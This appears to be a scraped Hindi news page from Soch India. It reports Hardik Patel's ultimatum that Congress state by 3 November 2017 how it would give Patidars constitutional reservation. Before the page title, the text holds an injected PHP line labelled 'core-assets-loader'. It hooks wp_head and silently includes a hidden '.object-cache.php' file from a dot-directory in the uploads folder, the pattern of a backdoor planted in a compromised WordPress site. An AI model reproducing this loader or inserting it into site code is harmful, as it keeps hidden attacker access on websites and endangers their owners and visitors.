add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); हार्दिक पटेल ने कांग्रेस को दिया अल्टीमेटम, कहा- 3 नवंबर तक बताओ कैसे दोगे आरक्षण – SOCH INDIA
Menu

राजनीति
हार्दिक पटेल ने कांग्रेस को दिया अल्टीमेटम, कहा- 3 नवंबर तक बताओ कैसे दोगे आरक्षण

nobanner

गुजरात चुनाव में हार्दिक पटेल को साथ आने का निमंत्रण दे चुकी कांग्रेस के सामने पाटीदार नेता आरक्षण की गुगली फेंक दी है. हार्दिक पटेल ने शनिवार को ट्वीट कर कांग्रेस को चेतावनी देते हुए कहा कि 3 नवंबर 2017 तक पाटीदारों को संवैधानिक आरक्षण देने पर अपना रुख साफ करे और बताए कि वह संवैधानिक आरक्षण कैसे देगी.

हार्दिक ने चेताते हुए कहा कि कांग्रेस इस मुद्दे पर अपना स्टैंड क्लियर कर दे नहीं, तो सूरत में अमित शाह जैसा मामला होगा. बता दें कि सूरत में अमित शाह की रैली में पाटीदारों ने जमकर बवाल मचाया था और तोड़फोड़ की थी.